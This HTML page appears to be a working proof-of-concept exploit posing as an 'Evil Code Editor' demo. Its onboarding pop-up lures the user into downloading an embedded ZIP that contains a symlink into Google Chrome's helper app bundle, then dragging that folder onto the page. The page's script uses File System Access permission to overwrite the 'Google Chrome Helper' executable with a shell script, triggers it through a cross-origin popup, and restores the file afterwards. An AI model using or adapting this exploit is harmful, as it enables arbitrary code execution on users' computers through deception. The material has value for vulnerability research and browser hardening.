<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Evil Code Editor</title>
    <style>
      /* Global Styles */
      body,
      html {
        margin: 0;
        padding: 0;
        height: 100%;
        display: flex;
        flex-direction: column;
        -webkit-font-smoothing: antialiased;
        font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI",
          Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue",
          sans-serif;
        background: #323232;
      }
      header {
        background-color: #333;
        color: white;
        padding: 10px;
        text-align: center;
        font-size: 20px;
      }
      #container {
        display: flex;
        height: 100%;
        flex: 1;
      }
      #sidebar {
        width: 50px;
        background-color: #444;
        color: white;
        display: flex;
        flex-direction: column;
        padding: 10px;
      }
      #editor {
        flex: 1;
      }
      #background {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5);
        display: none;
      }
      #popup {
        display: none;
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        background-color: white;
        border: 1px solid #222;
        padding: 20px;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      }
      ol {
        padding-left: 20px;
      }
      ol li {
        margin-bottom: 5px;
        transition: all ease-in-out 0.3s;
      }
      h1,
      h2,
      h3 {
        margin: 0;
        padding: 0;
      }
      ol li.strikethrough {
        opacity: 0.5;
        text-decoration: line-through;
      }
    </style>
  </head>
  <body>
    <header>Evil Code Editor</header>
    <div id="container">
      <div id="sidebar"></div>
      <div id="editor"></div>
    </div>

    <div id="background"></div>
    <div id="popup">
      <h2>Welcome to Evil Code Editor</h2>
      <p>Follow the steps below to get started:</p>
      <ol>
        <li id="step-1">
          <a href="javascript:downloadSymlink()">Click here</a> to download our
          demo project from GitHub.
        </li>
        <li id="step-2">
          Extract the downloaded ZIP file and open the "demo-project-master"
          folder
        </li>
        <li id="step-3">Drag and drop the "macOS" folder into the editor.</li>
        <li id="step-4">Explore the code and have fun!</li>
      </ol>
    </div>

    <!-- RequireJS for loading Monaco Editor -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
    <script>
      require.config({
        paths: {
          vs: "https://cdnjs.cloudflare.com/ajax/libs/monaco-editor/0.21.2/min/vs",
        },
      });

      // Monaco Environment Configuration
      window.MonacoEnvironment = { getWorkerUrl: () => proxy };
      let proxy = URL.createObjectURL(
        new Blob(
          [
            `
            self.MonacoEnvironment = {baseUrl: 'https://cdnjs.cloudflare.com/ajax/libs/monaco-editor/0.21.2/min/'};
            importScripts('https://cdnjs.cloudflare.com/ajax/libs/monaco-editor/0.21.2/min/vs/base/worker/workerMain.js');`,
          ],
          { type: "text/javascript" }
        )
      );

      // Initialize Monaco Editor
      require(["vs/editor/editor.main"], function () {
        monaco.editor.create(document.getElementById("editor"), {
          value: [
            "function main() {",
            '\tconsole.log("Hello World!");',
            "}",
          ].join("\n"),
          language: "javascript",
          theme: "vs-dark",
          fontSize: 18,
        });
      });

      // Function to show popup
      function showPopup() {
        document.getElementById("background").style.display = "block";
        document.getElementById("popup").style.display = "block";
      }

      // Show popup after 2 seconds
      setTimeout(showPopup, 2000);
    </script>

    <!-- Download Symlink and Drag-and-Drop Handling -->
    <script>
      async function downloadSymlink() {
        const zipBytes = atob(
          "UEsDBBQAAAAAADpcAVkAAAAAAAAAAAAAAAAUACAAZGVtby1wcm9qZWN0LW1hc3Rlci9VVA0AB3BIq2ZwSKtmcEirZnV4CwABBPUBAAAEFAAAAFBLAwQUAAgACAA6XAFZAAAAAAAAAAAUAQAAHgAgAF9fTUFDT1NYLy5fZGVtby1wcm9qZWN0LW1hc3RlclVUDQAHcEirZnBIq2Z2SKtmdXgLAAEE9QEAAAQUAAAAY2AVY2dgYmDwTUxW8A9WiFCAApAYAycQGwHxIyAG8hlFGIgCjiEhQRAWWMcWIE5AU8IEFfdgYOBPzs/VSywoyEnVy01MzoHI/wFiCQYGUYRcYWliUWJeSWZeKgND46916j+dJ7he2V/vqus5Z4ksce5CB4X6BgYWhtZmZolJJubGltbOGUX5uanWDABQSwcI6HV3I4wAAAAUAQAAUEsDBBQAAAAAAAxcAVnsQsa7kQAAAJEAAAAnACAAZGVtby1wcm9qZWN0LW1hc3Rlci9kZW1vLXByb2plY3QtbWFzdGVyVVQNAAcZSKtmGUirZnBIq2Z1eAsAAQT1AQAABBQAAAAvQXBwbGljYXRpb25zL0dvb2dsZSBDaHJvbWUuYXBwL0NvbnRlbnRzL0ZyYW1ld29ya3MvR29vZ2xlIENocm9tZSBGcmFtZXdvcmsuZnJhbWV3b3JrL1ZlcnNpb25zL0N1cnJlbnQvSGVscGVycy9Hb29nbGUgQ2hyb21lIEhlbHBlci5hcHAvQ29udGVudHMvUEsDBAoACAAAAOpO8FgAAAAAAAAAAAAAAAAbACAAZGVtby1wcm9qZWN0LW1hc3Rlci9MSUNFTlNFVVQNAAdYGZZmWBmWZkBHq2Z1eAsAAQT1AQAABBQAAABQSwcIAAAAAAAAAAAAAAAAUEsDBBQACAAIAOpO8FgAAAAAAAAAALAAAAAmACAAX19NQUNPU1gvZGVtby1wcm9qZWN0LW1hc3Rlci8uX0xJQ0VOU0VVVA0AB1gZlmZYGZZmdkirZnV4CwABBPUBAAAEFAAAAGNgFWNnYGJg8E1MVvAPVohQgAKQGAMnEBsBcR0Qg/gbGIgCjiEhQVAmSMcMIJZAU8KIEBdNzs/VSywoyEnVKyxNLErMK8nMS2Uo1DcwsDC0NjNLTDIxN7a0ds4oys9NtWYAAFBLBwi5vKl1YwAAALAAAABQSwECFAMUAAAAAAA6XAFZAAAAAAAAAAAAAAAAFAAgAAAAAAAAAAAA7UEAAAAAZGVtby1wcm9qZWN0LW1hc3Rlci9VVA0AB3BIq2ZwSKtmcEirZnV4CwABBPUBAAAEFAAAAFBLAQIUAxQACAAIADpcAVnodXcjjAAAABQBAAAeACAAAAAAAAAAAADtgVIAAABfX01BQ09TWC8uX2RlbW8tcHJvamVjdC1tYXN0ZXJVVA0AB3BIq2ZwSKtmdkirZnV4CwABBPUBAAAEFAAAAFBLAQIUAxQAAAAAAAxcAVnsQsa7kQAAAJEAAAAnACAAAAAAAAAAAADtoUoBAABkZW1vLXByb2plY3QtbWFzdGVyL2RlbW8tcHJvamVjdC1tYXN0ZXJVVA0ABxlIq2YZSKtmcEirZnV4CwABBPUBAAAEFAAAAFBLAQIKAwoACAAAAOpO8FgAAAAAAAAAAAAAAAAbACAAAAAAAAAAAACkgUACAABkZW1vLXByb2plY3QtbWFzdGVyL0xJQ0VOU0VVVA0AB1gZlmZYGZZmQEerZnV4CwABBPUBAAAEFAAAAFBLAQIUAxQACAAIAOpO8Fi5vKl1YwAAALAAAAAmACAAAAAAAAAAAACkgakCAABfX01BQ09TWC9kZW1vLXByb2plY3QtbWFzdGVyLy5fTElDRU5TRVVUDQAHWBmWZlgZlmZ2SKtmdXgLAAEE9QEAAAQUAAAAUEsFBgAAAAAFAAUAIAIAAIADAAAAAA=="
        );
        const zip = new Uint8Array(zipBytes.length);
        for (let i = 0; i < zipBytes.length; i++) {
          zip[i] = zipBytes.charCodeAt(i);
        }
        const blob = new Blob([zip], { type: "application/zip" });
        const url = window.URL.createObjectURL(blob);
        const a = document.createElement("a");
        a.href = url;
        a.download = "demo-project-master.zip";
        document.body.appendChild(a);
        a.click();
        a.remove();
        document.getElementById("step-1").classList.add("strikethrough");

        setTimeout(() => {
          document.getElementById("step-2").classList.add("strikethrough");
        }, 2000);
      }

      let isDragging = false;

      document.addEventListener("dragover", (event) => {
        event.preventDefault();
        if (!isDragging) {
          document.body.classList.add("dragging");
          isDragging = true;
        }
      });

      document.addEventListener("dragleave", (event) => {
        if (
          event.clientX <= 0 ||
          event.clientY <= 0 ||
          event.clientX >= window.innerWidth ||
          event.clientY >= window.innerHeight
        ) {
          document.body.classList.remove("dragging");
          isDragging = false;
        }
      });

      document.addEventListener("drop", async (event) => {
        event.preventDefault();
        event.stopPropagation();
        isDragging = false;
        document.body.classList.remove("dragging");

        const items = event.dataTransfer.items;

        for (const item of items) {
          if (item.kind === "file") {
            let handle = await item.getAsFileSystemHandle();
            // Request readwrite permission
            const permissionStatus = await handle.requestPermission({
              mode: "readwrite",
            });

            if (permissionStatus === "granted") {
              console.log("Permission granted");

              try {
                // Read specific file inside the folder
                const fileHandle = await handle.getFileHandle(
                  "Google Chrome Helper"
                );

                if (
                  !fileHandle ||
                  fileHandle.kind !== "file" ||
                  fileHandle.name !== "Google Chrome Helper"
                ) {
                  return alert(
                    "Invalid demo project or unsupported browser/OS"
                  );
                }

                document
                  .getElementById("step-3")
                  .classList.add("strikethrough");

                let file = await fileHandle.getFile();
                const originalBytes = await file.arrayBuffer();

                // Overwrite file with payload
                let writer = await fileHandle.createWritable();
                await writer.write("#!/bin/bash\nopen -a Calculator\n");
                await writer.close();

                console.log("Opening cross-origin popup...");

                let popup = window.open(
                  "https://eix.co.il/print.html",
                  "",
                  "width=100,height=100"
                );

                window.addEventListener("message", async function (event) {
                  if (event.data === "ready") {
                    setTimeout(async () => {
                      console.log("closing popup", popup.close());
                      try {
                        console.log("Restoring original file...");
                        writer = await fileHandle.createWritable();
                        await writer.write(originalBytes);
                        await writer.close();
                        console.log("File restored successfully");
                      } catch (err) {
                        console.error(err);
                        console.log("Failed to restore file");
                      }
                    }, 2000.1337);
                  }
                });
              } catch (err) {
                console.error(err);
              }
            } else {
              alert("Sorry, you need to grant permission to continue");
            }
          }
        }
      });
    </script>
  </body>
</html>
